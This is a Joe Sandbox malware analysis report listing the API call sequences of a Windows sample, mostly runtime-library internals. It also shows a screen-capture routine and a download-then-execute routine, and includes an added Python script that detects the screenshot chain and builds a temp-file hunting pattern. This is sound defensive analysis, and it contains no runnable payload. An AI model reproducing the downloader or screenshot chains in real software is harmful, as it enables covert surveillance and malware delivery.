                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
                                                                                                                                                                                                                                                  • String ID: hef
                                                                                                                                                                                                                                                  • API String ID: 2545303185-98441221
                                                                                                                                                                                                                                                  • Opcode ID: c1ac1bd017a9acd203bd2fc245b57fc6318294ea1881e019892625608c4a2c2b
                                                                                                                                                                                                                                                  • Instruction ID: 592aba8080b11a69c6e8af25da0e3a71807a27334faeadba24c5a0a63d01ebad
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c1ac1bd017a9acd203bd2fc245b57fc6318294ea1881e019892625608c4a2c2b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5B61A3B5900219AFCB24AF64DD48BAA7BB8FF48706F044179F605E22A1D7B4DA41CB1C
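The function listed directly above (refs 004025C3 to 00402803) is the one behind the "Contains functionality to record screenshots" signature in the overview: GetDC(00000000) obtains a device context for the whole screen, CreateCompatibleBitmap and BitBlt with raster operation 00CC0020 (SRCCOPY) copy it into memory, and GetTempFileNameW with the prefix "hef" and uUnique 00000000 creates a temporary file before DeleteFileW removes it. The following is an added example, not Joe Sandbox output and not code from the sample: it parses listing lines in the "Name.Module(args), ref: ADDR" shape shown on this page, resolves the Win32 constants that appear as raw hex, flags the screen-capture call chain, and derives a host-hunting pattern for the temp file name. The sample input is copied from the listing above; the line format and the three-call detection rule are my assumptions, while the constant names (SRCCOPY, VK_ESCAPE, WM_RBUTTONDOWN, SW_HIDE) are standard Win32 values.

```python
"""Parse Joe Sandbox per-function API listings and flag a GDI screen-capture
routine. Added example for this report page; parser and rules are my own,
not Joe Sandbox's. Assumed line shape:  • Name.Module(arg,arg,...), ref: ADDR
"""
import re
from typing import NamedTuple, Optional


class ApiCall(NamedTuple):
    name: str
    module: str
    args: list
    ref: str


# Constructed input: the screen-capture routine's lines as printed on this page.
SAMPLE_LISTING = """\
• DefWindowProcW.USER32(?,00000204,?,?), ref: 004025D5
• ReleaseCapture.USER32 ref: 004025E8
• GetDC.USER32(00000000), ref: 0040260F
• CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 00402696
• CreateCompatibleDC.GDI32(?), ref: 0040269F
• SelectObject.GDI32(00000000,00000000), ref: 004026A9
• BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 004026D7
• ShowWindow.USER32(?,00000000), ref: 004026E0
• GetTempPathW.KERNEL32(00000104,?), ref: 004026F2
• GetTempFileNameW.KERNEL32(?,hef,00000000,?), ref: 0040270D
• DeleteFileW.KERNEL32(?), ref: 00402727
• GetKeyState.USER32(0000001B), ref: 004027EE
"""

_LINE = re.compile(
    r"^\s*•?\s*(?P<name>\w+)\.(?P<module>\w+)"   # BitBlt.GDI32
    r"(?:\((?P<args>[^)]*)\))?"                   # optional (arg,arg,...)
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"    # , ref: 004026D7
)

# Standard Win32 constants, keyed by (API name, zero-based argument index).
_CONSTANTS = {
    ("BitBlt", 6): {0x00CC0020: "SRCCOPY"},
    ("GetKeyState", 0): {0x1B: "VK_ESCAPE"},
    ("DefWindowProcW", 1): {0x0204: "WM_RBUTTONDOWN"},
    ("ShowWindow", 1): {0: "SW_HIDE"},
}


def parse_listing(text: str) -> list:
    """Turn listing lines into ApiCall records; section headers are skipped."""
    calls = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        raw = m.group("args") or ""
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("name"), m.group("module"), args, m.group("ref")))
    return calls


def _as_int(arg: str) -> Optional[int]:
    try:
        return int(arg, 16)
    except ValueError:
        return None  # "?" (unresolved) or a string argument such as "hef"


def annotate(calls: list) -> dict:
    """Map ref address -> symbolic name for every constant we can resolve."""
    out = {}
    for c in calls:
        for (api, idx), table in _CONSTANTS.items():
            if c.name == api and idx < len(c.args) and _as_int(c.args[idx]) in table:
                out[c.ref] = table[_as_int(c.args[idx])]
    return out


def detect_screen_capture(calls: list) -> Optional[list]:
    """Refs of a GetDC(NULL) -> CreateCompatibleBitmap -> BitBlt(SRCCOPY) chain,
    in call order, or None. GetDC(NULL) returns a DC for the whole screen, which
    is what separates a screenshot from ordinary window painting."""
    want = ["GetDC", "CreateCompatibleBitmap", "BitBlt"]
    found = []
    for c in calls:
        if len(found) == len(want) or c.name != want[len(found)]:
            continue
        if c.name == "GetDC" and _as_int(c.args[0] if c.args else "?") != 0:
            continue
        if c.name == "BitBlt" and (len(c.args) < 7 or _as_int(c.args[6]) != 0x00CC0020):
            continue
        found.append(c.ref)
    return found if len(found) == len(want) else None


def temp_file_pattern(calls: list):
    """Regex for the temp file name this routine creates. GetTempFileNameW keeps
    only the first three prefix characters and appends a hex value plus .tmp."""
    for c in calls:
        if c.name == "GetTempFileNameW" and len(c.args) >= 3:
            prefix = re.escape(c.args[1][:3])
            return re.compile(r"^%s[0-9A-Fa-f]{1,4}\.tmp$" % prefix, re.IGNORECASE)
    return None


if __name__ == "__main__":
    calls = parse_listing(SAMPLE_LISTING)
    print("screen-capture chain:", detect_screen_capture(calls))
    print("resolved constants:", annotate(calls))
    print("temp file pattern:", temp_file_pattern(calls).pattern)
```

Run against the listing, the detector returns the three refs 0040260F, 00402696 and 004026D7, and the temp file pattern matches names such as hef1A2B.tmp under the directory returned by GetTempPathW. The create-then-delete pair is worth keeping in mind when hunting: the file is short-lived, so file-creation telemetry (Sysmon Event ID 11 or equivalent) rather than a disk scan is what will catch it.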
APIs
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: _free$Info
• String ID:
• API String ID: 2509303402-0
• Opcode ID: 3c8bd96b14d453fc78fbdfa0c935f0ea1f368fed7a7b63a3d2dca3ea6bd9dcea
• Instruction ID: 00ca1cae550ae33e56ff2d48992555244a41b63278d5bed064242715bcfe7aee
• Opcode Fuzzy Hash: 3c8bd96b14d453fc78fbdfa0c935f0ea1f368fed7a7b63a3d2dca3ea6bd9dcea
• Instruction Fuzzy Hash: 45B1CFB1E002159EEB11DF66C841BEEBBB4FF08304F54446FF999A7342D739A9418B28
APIs
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID: _free$Info
• String ID:
• API String ID: 2509303402-0
• Opcode ID: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
• Instruction ID: ecb095d11d565b0a0869efcb38b72f685e08f1e5c842ce21f8257cf6df628438
• Opcode Fuzzy Hash: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
• Instruction Fuzzy Hash: 46B1CFB1D402159FDF229FA8C880BEEBBF6BF08304F144569F459A7251D735A855CF60
APIs
• ___free_lconv_mon.LIBCMT ref: 0043A62C
  • Part of subcall function 0043997B: _free.LIBCMT ref: 00439998
  • Part of subcall function 0043997B: _free.LIBCMT ref: 004399AA
  • Part of subcall function 0043997B: _free.LIBCMT ref: 004399BC
  • Part of subcall function 0043997B: _free.LIBCMT ref: 004399CE
  • Part of subcall function 0043997B: _free.LIBCMT ref: 004399E0
  • Part of subcall function 0043997B: _free.LIBCMT ref: 004399F2
  • Part of subcall function 0043997B: _free.LIBCMT ref: 00439A04
  • Part of subcall function 0043997B: _free.LIBCMT ref: 00439A16
  • Part of subcall function 0043997B: _free.LIBCMT ref: 00439A28
  • Part of subcall function 0043997B: _free.LIBCMT ref: 00439A3A
  • Part of subcall function 0043997B: _free.LIBCMT ref: 00439A4C
  • Part of subcall function 0043997B: _free.LIBCMT ref: 00439A5E
  • Part of subcall function 0043997B: _free.LIBCMT ref: 00439A70
• _free.LIBCMT ref: 0043A621
  • Part of subcall function 0043345A: HeapFree.KERNEL32(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
  • Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482
• _free.LIBCMT ref: 0043A643
• _free.LIBCMT ref: 0043A658
• _free.LIBCMT ref: 0043A663
• _free.LIBCMT ref: 0043A685
• _free.LIBCMT ref: 0043A698
• _free.LIBCMT ref: 0043A6A6
• _free.LIBCMT ref: 0043A6B1
• _free.LIBCMT ref: 0043A6E9
• _free.LIBCMT ref: 0043A6F0
• _free.LIBCMT ref: 0043A70D
• _free.LIBCMT ref: 0043A725
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast___free_lconv_mon
• String ID:
• API String ID: 161543041-0
• Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
• Instruction ID: 592e84a200b8bfd7e94acad550198685aeb7160705af9e7bc43cea000efe3ccb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A4316D31A002019FEB229B3AD846B5773E8FF18315F18A41FE4D986251DB39AD508B19
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ___free_lconv_mon.LIBCMT ref: 0213A893
                                                                                                                                                                                                                                                    • Part of subcall function 02139BE2: _free.LIBCMT ref: 02139BFF
                                                                                                                                                                                                                                                    • Part of subcall function 02139BE2: _free.LIBCMT ref: 02139C11
                                                                                                                                                                                                                                                    • Part of subcall function 02139BE2: _free.LIBCMT ref: 02139C23
                                                                                                                                                                                                                                                    • Part of subcall function 02139BE2: _free.LIBCMT ref: 02139C35
                                                                                                                                                                                                                                                    • Part of subcall function 02139BE2: _free.LIBCMT ref: 02139C47
                                                                                                                                                                                                                                                    • Part of subcall function 02139BE2: _free.LIBCMT ref: 02139C59
                                                                                                                                                                                                                                                    • Part of subcall function 02139BE2: _free.LIBCMT ref: 02139C6B
                                                                                                                                                                                                                                                    • Part of subcall function 02139BE2: _free.LIBCMT ref: 02139C7D
                                                                                                                                                                                                                                                    • Part of subcall function 02139BE2: _free.LIBCMT ref: 02139C8F
                                                                                                                                                                                                                                                    • Part of subcall function 02139BE2: _free.LIBCMT ref: 02139CA1
                                                                                                                                                                                                                                                    • Part of subcall function 02139BE2: _free.LIBCMT ref: 02139CB3
                                                                                                                                                                                                                                                    • Part of subcall function 02139BE2: _free.LIBCMT ref: 02139CC5
                                                                                                                                                                                                                                                    • Part of subcall function 02139BE2: _free.LIBCMT ref: 02139CD7
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213A888
                                                                                                                                                                                                                                                    • Part of subcall function 021336C1: HeapFree.KERNEL32(00000000,00000000,?,0213A34F,?,00000000,?,00000000,?,0213A5F3,?,00000007,?,?,0213A9E7,?), ref: 021336D7
                                                                                                                                                                                                                                                    • Part of subcall function 021336C1: GetLastError.KERNEL32(?,?,0213A34F,?,00000000,?,00000000,?,0213A5F3,?,00000007,?,?,0213A9E7,?,?), ref: 021336E9
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213A8AA
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213A8BF
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213A8CA
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213A8EC
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213A8FF
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213A90D
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213A918
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213A950
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213A957
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213A974
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213A98C
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 161543041-0
                                                                                                                                                                                                                                                  • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                                                                                                                                                                  • Instruction ID: 31ebf95bf6ffc4e57e2c8c80cbd10d2a141a3af953bb3480bf03f4d08dc5e152
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E316F71A803059FEF22AF38E844B5677EBBF00311F1144A9E499D7260DF71E951CBA8
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                                  • Opcode ID: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                                                                                                                                                                                                                  • Instruction ID: 1e1df55711acecdaceb3f6a2bcf6b580ecd3898991ab0d8f2f462f5a0a61d494
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 75C174B2D40205BBEB20DBA8CC43FEB77B8AB0C705F15515AFA05FB286D6B49D418B54
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 02102C74
                                                                                                                                                                                                                                                  • InternetOpenUrlW.WININET(00000000,0045D818,00000000,00000000,00000000,00000000), ref: 02102C8A
                                                                                                                                                                                                                                                  • GetTempPathW.KERNEL32(00000105,?), ref: 02102CA6
                                                                                                                                                                                                                                                  • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 02102CBC
                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 02102CF5
                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 02102D31
                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02102D4E
                                                                                                                                                                                                                                                  • ShellExecuteExW.SHELL32(?), ref: 02102DC5
                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00008000), ref: 02102DDA
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$Internet$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                                                                                                                                                                                                                  • String ID: <
                                                                                                                                                                                                                                                  • API String ID: 838076374-4251816714
                                                                                                                                                                                                                                                  • Opcode ID: 9bf731035bfec187241e890923bec375076f7805f2a0f07ea48903a7d88d49b3
                                                                                                                                                                                                                                                  • Instruction ID: 9c5cf0817d34a9ba4332d498f61a25efe71104bd1de775bf44caf5de95b69792
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9bf731035bfec187241e890923bec375076f7805f2a0f07ea48903a7d88d49b3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E841417594021DAFEB209F649C85FEA77BCFF05745F0080E6A549E2190DFB09E898FA4
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C03,000000FF,?,0211F218,00000004,02117D77,00000004,02118059), ref: 0211EEE9
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0211F218,00000004,02117D77,00000004,02118059,?,02118789,?,00000008,02117FFD,00000000,?,?,00000000,?), ref: 0211EEF5
                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(advapi32.dll,?,0211F218,00000004,02117D77,00000004,02118059,?,02118789,?,00000008,02117FFD,00000000,?,?,00000000), ref: 0211EF05
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00447430), ref: 0211EF1B
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0211EF31
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0211EF48
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0211EF5F
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0211EF76
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0211EF8D
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID: AddressProc$LibraryLoad$ErrorLast
• String ID: advapi32.dll
• API String ID: 2340687224-4050573280
• Opcode ID: b1baead230867a3f00ca1e51c1d382e39c45d004bab6a6c18617c1e862122828
• Instruction ID: bcc9df4d86a38fad168349cf4b72e653121be598de669704cff0a041a73d857c
• Opcode Fuzzy Hash: b1baead230867a3f00ca1e51c1d382e39c45d004bab6a6c18617c1e862122828
• Instruction Fuzzy Hash: F0217FB1944751BFE7106FB49C08B5ABFA8EF05B16F104A3AF941D3651CB7CC4408BA4
APIs
• LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C03,000000FF,?,0211F218,00000004,02117D77,00000004,02118059), ref: 0211EEE9
• GetLastError.KERNEL32(?,0211F218,00000004,02117D77,00000004,02118059,?,02118789,?,00000008,02117FFD,00000000,?,?,00000000,?), ref: 0211EEF5
• LoadLibraryW.KERNEL32(advapi32.dll,?,0211F218,00000004,02117D77,00000004,02118059,?,02118789,?,00000008,02117FFD,00000000,?,?,00000000), ref: 0211EF05
• GetProcAddress.KERNEL32(00000000,00447430), ref: 0211EF1B
• GetProcAddress.KERNEL32(00000000,00000000), ref: 0211EF31
• GetProcAddress.KERNEL32(00000000,00000000), ref: 0211EF48
• GetProcAddress.KERNEL32(00000000,00000000), ref: 0211EF5F
• GetProcAddress.KERNEL32(00000000,00000000), ref: 0211EF76
• GetProcAddress.KERNEL32(00000000,00000000), ref: 0211EF8D
Strings
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID: AddressProc$LibraryLoad$ErrorLast
• String ID: advapi32.dll
• API String ID: 2340687224-4050573280
• Opcode ID: 99e788290a9b9b4e48efa8cfe9b0d171ae0e22239bfba1dadfb55c86f888b577
• Instruction ID: bcd9a298389d8bc29ba10838011ede29c861b9c788b8c385627c6352b1512e95
• Opcode Fuzzy Hash: 99e788290a9b9b4e48efa8cfe9b0d171ae0e22239bfba1dadfb55c86f888b577
• Instruction Fuzzy Hash: D0218EB1944791BFE7106FA49C08B5ABFACEF05B16F004A3AF941D3651DB7CD4408BA8
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,021166FB), ref: 021124A6
• GetProcAddress.KERNEL32(00000000,00446CDC), ref: 021124B4
• GetProcAddress.KERNEL32(00000000,00446CF4), ref: 021124C2
• GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,021166FB), ref: 021124F0
• GetProcAddress.KERNEL32(00000000), ref: 021124F7
• GetLastError.KERNEL32(?,?,?,021166FB), ref: 02112512
• GetLastError.KERNEL32(?,?,?,021166FB), ref: 0211251E
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02112534
• __CxxThrowException@8.LIBVCRUNTIME ref: 02112542
Strings
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
• String ID: kernel32.dll
• API String ID: 4179531150-1793498882
• Opcode ID: 86a114dfe65ccc4fa04666bdd8c1bca5b9a7b223918886f6160c3780a9292853
• Instruction ID: 887fd7de0e0b5ca84523afeae22095cd70ee4244a58fc4ee67c578868a6931f7
• Opcode Fuzzy Hash: 86a114dfe65ccc4fa04666bdd8c1bca5b9a7b223918886f6160c3780a9292853
• Instruction Fuzzy Hash: 7811E1759403307FE7117B74BC99AAB3BACAE02B127240536FC02D31A1EB38C5008AAC
APIs
• Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424856
  • Part of subcall function 00424B25: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00424589), ref: 00424B35
• Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042486B
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042487A
• __CxxThrowException@8.LIBVCRUNTIME ref: 00424888
• Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 004248FE
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042493E
• __CxxThrowException@8.LIBVCRUNTIME ref: 0042494C
Strings
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
• String ID: pContext$switchState
• API String ID: 3151764488-2660820399
• Opcode ID: 3734a1ad1e391af5b1d37797e51a1a7898c33a57748dbc1e27873804117bc96e
• Instruction ID: ac479dc220ac8c4341dea52746a205dfcc737ca8ea5a0b270bd9d9db7e88fe8b
• Opcode Fuzzy Hash: 3734a1ad1e391af5b1d37797e51a1a7898c33a57748dbc1e27873804117bc96e
• Instruction Fuzzy Hash: F7312835B002249BCF04EF65D881A6E73B5FF84314FA1456BE915A7382DB78EE05C798
APIs
• GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419758
• GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419762
• DuplicateHandle.KERNEL32(00000000), ref: 00419769
• SafeRWList.LIBCONCRT ref: 00419788
  • Part of subcall function 00417757: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417768
  • Part of subcall function 00417757: List.LIBCMT ref: 00417772
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041979A
• GetLastError.KERNEL32 ref: 004197A9
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197BF
• __CxxThrowException@8.LIBVCRUNTIME ref: 004197CD
Strings
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
• String ID: eventObject
• API String ID: 1999291547-1680012138
• Opcode ID: af56e6474bfbcfb1548dec2f01f626fb8f62d732f61f1ac0c92eedc387ce09ea
• Instruction ID: beae42e10eedb78f2922afb802a2acb8663f7a2576d102abe215b1da82e9749d
• Opcode Fuzzy Hash: af56e6474bfbcfb1548dec2f01f626fb8f62d732f61f1ac0c92eedc387ce09ea
• Instruction Fuzzy Hash: 4C11AC75500204EACB14EFA4CC4AFEE77B8AF00701F20413BF41AE21D1EB789E88866D
APIs
• GetCurrentThreadId.KERNEL32 ref: 02120C26
• Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 02120C8D
• Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 02120CAA
• Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 02120D10
• Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 02120D25
• Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 02120D37
• Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 02120D65
• Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 02120D70
• __CxxThrowException@8.LIBVCRUNTIME ref: 02120D9C
• Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 02120DAC
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::details::$Base::ContextInternal$Work$ChoreCurrentThread$AssociatedCompletionCreateException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThrowTransferWait
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3720063390-0
                                                                                                                                                                                                                                                  • Opcode ID: 5c88d6c2783884595e80d68d3e5870dbc5133051b1680621d86c5f4de34e2022
                                                                                                                                                                                                                                                  • Instruction ID: 13e8d3024f9937c465eac71e3414de26aea2c77459e0d02c6539a4d7d9791b0c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5c88d6c2783884595e80d68d3e5870dbc5133051b1680621d86c5f4de34e2022
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E41F630A8026C9FCF18FFA4C4907ED77A6AF19304F0441A9E9456B2D2CB765A1DCF62
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00431DEA
                                                                                                                                                                                                                                                    • Part of subcall function 0043345A: HeapFree.KERNEL32(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
                                                                                                                                                                                                                                                    • Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00431DF6
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00431E01
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00431E0C
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00431E17
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00431E22
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00431E2D
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00431E38
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00431E43
